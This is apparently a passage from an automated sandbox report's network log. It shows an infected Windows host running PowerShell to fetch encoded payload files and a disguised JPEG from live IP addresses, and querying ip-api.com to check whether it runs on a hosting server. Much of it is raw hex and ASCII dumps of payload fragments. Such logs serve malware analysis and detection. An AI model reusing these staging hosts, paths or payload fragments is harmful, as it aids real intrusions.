                  Jul 5, 2024 07:26:40.390974998 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                  Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                  Jul 5, 2024 07:26:40.391136885 CEST224INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                  Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g
                  Jul 5, 2024 07:26:40.391145945 CEST1236INData Raw: 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98
                  Data Ascii: >o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]U
                  Jul 5, 2024 07:26:40.391151905 CEST1236INData Raw: 4e 95 48 73 a7 95 fe 07 8c f1 31 69 0e c2 bf 78 70 7d eb 17 f1 2f 3f 44 13 ee f2 79 c5 a8 30 6b 15 81 ee 65 fb 67 a7 72 8a 9a 79 55 57 90 b6 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48
                  Data Ascii: NHs1ixp}/?Dy0kegryUW8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7A


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.2249174208.95.112.1803276C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:39.947801113 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:40.480875015 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:40 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 49
                  X-Rl: 41
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:40.691128016 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:40 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 49
                  X-Rl: 41
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.2249175198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:43.907555103 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:44.409357071 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                  Accept-Ranges: bytes
                  ETag: "96b1143f5eccda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:44 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 07:26:44.409378052 CEST224INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3
                  Jul 5, 2024 07:26:44.409388065 CEST1236INData Raw: 59 6c 4e 48 50 67 41 43 49 67 6f 51 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38
                  Data Ascii: YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4CMuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN
                  Jul 5, 2024 07:26:44.409435034 CEST1236INData Raw: 41 41 41 77 54 41 59 45 41 4f 42 51 53 41 38 46 41 4f 42 77 54 41 6b 45 41 54 42 67 55 41 55 45 41 57 42 77 58 41 4d 46 41 57 42 41 41 41 51 6a 41 38 43 41 41 41 41 41 41 41 41 41 41 41 41 51 41 71 44 77 41 6a 7a 46 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AAAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAAACAAoBAAAEAABAAAAAAAAAAAAAAAAAAAAAAAACAAAAAABAAAAAAAAAAAAAAAAAAAACAA4AAAAEAABAAAAAAAAAAAAAAAAAAAACAAQBAAAgBgAAAIAAAAQA
                  Jul 5, 2024 07:26:44.409449100 CEST1236INData Raw: 49 4d 55 49 67 53 41 41 41 46 6b 76 67 53 59 41 42 4b 6b 76 67 53 45 67 41 67 63 51 39 43 4b 52 48 41 41 69 42 4e 4d 6f 45 42 4d 6f 45 42 41 41 43 49 67 51 41 43 41 53 42 46 4d 59 45 41 41 53 42 4a 4d 6f 45 41 41 51 42 49 55 77 67 52 55 77 67 52
                  Data Ascii: IMUIgSAAAFkvgSYABKkvgSEgAgcQ9CKRHAAiBNMoEBMoEBAACIgQACASBFMYEAASBJMoEAAQBIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CKR8CKR7CGhDHgCCI0hEF0BBHgAHCEAAEgQRBKhDxKoEOEugSYwBO4Q6CKRAgYQ5CKBAgUACxKoEBUrgSUhDxKoE9EoEhLoEOcwBWkIgSAAAF4QLBKRHBAwBIgQLBKRHtE
                  Jul 5, 2024 07:26:44.409456015 CEST1236INData Raw: 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67 41 67 42 4b 52 41 68 44 59 45 56 67 51 42 64
                  Data Ascii: Bd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOg
                  Jul 5, 2024 07:26:44.409462929 CEST1236INData Raw: 51 42 4b 52 42 64 67 67 44 4f 34 41 57 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 34 51 41 4e 4a 52 46 4e 63 77 48 49 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 56 47 6f 45 68 49 6f 45 4f 55 5a 67 53 45 69 67 53 34 67 44 64 34 51 48 4f 34 67 44 42
                  Data Ascii: QBKRBdggDO4AWBKhDAFoEB0kEV4QANJRFNcwHIggDdggDdggDd4QHVGoEhIoEOUZgSEigS4gDd4QHO4gDB0kEV4QHOUxBqgQeSkfgSknE5HoEOEQ4AGRFtGoEtGoEO4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGoEY4AQBKRANJRFTc
                  Jul 5, 2024 07:26:44.409634113 CEST1236INData Raw: 41 4e 4a 52 46 4a 63 67 4a 49 6b 59 67 53 6b 59 67 53 45 77 41 41 6f 41 43 4f 55 68 67 53 55 51 48 52 48 6f 45 56 49 6f 45 46 30 52 42 64 55 51 48 46 30 52 42 64 55 6a 67 53 55 51 48 4e 63 67 48 49 67 67 44 44 34 67 44 47 63 41 43 46 67 51 41 41
                  Data Ascii: ANJRFJcgJIkYgSkYgSEwAAoACOUhgSUQHRHoEVIoEF0RBdUQHF0RBdUjgSUQHNcgHIggDD4gDGcACFgQAAQACAFoEI4QHF0RBdgACF0hDAFoEB0kEV4ADHoBCIgQHIgQHI0BCdgACdgACIgQHI0hDPcAGIgQBdgwAgcgCIEAAEEjgR0igRkigR4QAEASDIAUgSEQ4AGRFOEQ4AGRFOEQ4AGRFOEQ4AGRFAFoEB0kEVAUgSIgDIg
                  Jul 5, 2024 07:26:44.409646988 CEST1236INData Raw: 67 53 55 42 41 65 45 51 54 53 55 52 41 42 41 42 45 4f 45 67 43 44 67 41 41 65 45 51 5a 42 4b 52 46 41 34 52 41 6c 46 6f 45 56 49 51 41 51 49 68 44 49 45 41 49 45 67 77 41 49 34 67 44 49 34 67 44 49 34 41 43 49 34 51 41 4e 4a 52 46 49 34 51 41 4e
                  Data Ascii: gSUBAeEQTSURABABEOEgCDgAAeEQZBKRFA4RAlFoEVIQAQIhDIEAIEgwAI4gDI4gDI4ACI4QANJRFI4QANJRFD4QANJRFOIxBggACIgABHYAHO4gAAUACOEAAEwhDcIAIFgACO0BQBKRANJRFAFoEO4gDOUagS4QpBKhDAFoEB0kEV4wBjEdgSAAIFgQBd4QACKRBd0cgSUQHHcAEIggDdAUgSUQHlGoEOUagS4AQBKRANJRFKc
                  Jul 5, 2024 07:26:44.409658909 CEST1000INData Raw: 41 67 59 51 73 42 4b 42 41 67 55 67 44 74 47 6f 45 42 41 69 42 49 4d 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 67 44 4f 67 41 57 42 4b 68 44 4f 34 41 51 42 4b 52 41 4e 4a 52 46 4e 63 41 49 44 30 68 44 64 45 41 49 47 67 77 41 64 41 55 67 53
                  Data Ascii: AgYQsBKBAgUgDtGoEBAiBIMQHAFoEB0kEVAUgS4gDOgAWBKhDO4AQBKRANJRFNcAID0hDdEAIGgwAdAUgSEQTSUBQBKRHS0hEO4QHOUagSAUgSEQTSUxCHECCFEAAEgACF0xAHYACDEAAEUQHC4QpBKRAgYQpBKhBEgwAdMQHD0BCO0BCO0BCO0hDdAUgSUQHOUagS4QpBKhDlGoEOUQHO0BQBKRANJRFXcQMdGoEAASBAMRHAA
                  Jul 5, 2024 07:26:44.414243937 CEST1236INData Raw: 41 4b 51 41 41 65 41 67 48 41 34 42 45 41 34 78 41 42 41 42 44 49 77 6b 45 4d 4a 42 54 53 51 77 42 4a 34 67 44 42 49 41 49 46 34 67 44 43 49 41 41 46 34 41 48 42 41 43 42 42 46 6f 45 41 41 53 42 46 46 6f 45 41 41 53 42 39 45 6f 45 41 41 53 42 49
                  Data Ascii: AKQAAeAgHA4BEA4xABABDIwkEMJBTSQwBJ4gDBIAIF4gDCIAAF4AHBACBBFoEAASBFFoEAASB9EoEAASBIUUgSUUgSIQQBKRQBKRPBKROBKBCHYBCY4QHI4QHFcQCIEQAAQAC1FRdRIgCFcQCIIgDDcQBYAAID0SgSAAAFggACMwBFgAAAMACJIwBEAUEBoABA4BCBEAEGgRBBAABO0PgSEAIGklEAACBKgRAAQAHcEAIEghBBA


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.224917691.92.254.194801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:44.921622992 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:45.549454927 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:45 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                  Jul 5, 2024 07:26:45.549498081 CEST1236INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                  Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:{
                  Jul 5, 2024 07:26:45.549513102 CEST448INData Raw: e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c
                  Data Ascii: p\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                  Jul 5, 2024 07:26:45.549616098 CEST1236INData Raw: f1 66 67 70 d4 db be e8 a1 7e 34 c3 71 cb f8 33 b7 ff 00 75 6f 1f 9d 1a 80 d3 22 15 3d f8 8f 9f a6 d3 8b eb 75 25 3e dc 47 1b 10 37 f8 ae fd ec 3d 5f fd 8a 82 af a5 7a b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31
                  Data Ascii: fgp~4q3uo"=u%>G7=_z0bxxZx|{e1fV>).#k]};~,H<+=h,bP=F[8k|"t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8h
                  Jul 5, 2024 07:26:45.549627066 CEST1236INData Raw: aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f
                  Data Ascii: S3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h6gy{,i%{{V{<cc@QgT+aaAj5:e[2<uHUYN61UnZ
                  Jul 5, 2024 07:26:45.549635887 CEST448INData Raw: fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70
                  Data Ascii: o|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3:l[;Q<*H"Vue?<jOE'>Ir.t(H'l`Y,JV'-*a,Y0:WvumCm`hskRC06f@
                  Jul 5, 2024 07:26:45.629064083 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                  Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                  Jul 5, 2024 07:26:45.629087925 CEST1236INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                  Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
                  Jul 5, 2024 07:26:45.629157066 CEST1236INData Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8
                  Data Ascii: uFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
                  Jul 5, 2024 07:26:45.629168987 CEST672INData Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07
                  Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU|/e>Oq};3FYmxa|I'4J:B=
                  Jul 5, 2024 07:26:45.629302979 CEST1236INData Raw: 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38
                  Data Ascii: @g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u9$<X*6g&G?oVhm['Sj~(|mV&4z!#n9


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.2249177208.95.112.1803352C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:45.385138988 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:45.854634047 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:45 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 44
                  X-Rl: 40
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:46.067018986 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:45 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 44
                  X-Rl: 40
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.2249178198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:49.235716105 CEST85OUTGET /controlfirebase65.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:49.732911110 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Thu, 27 Jun 2024 18:06:51 GMT
                  Accept-Ranges: bytes
                  ETag: "477816c9bcc8da1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:49 GMT
                  Content-Length: 328364
                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
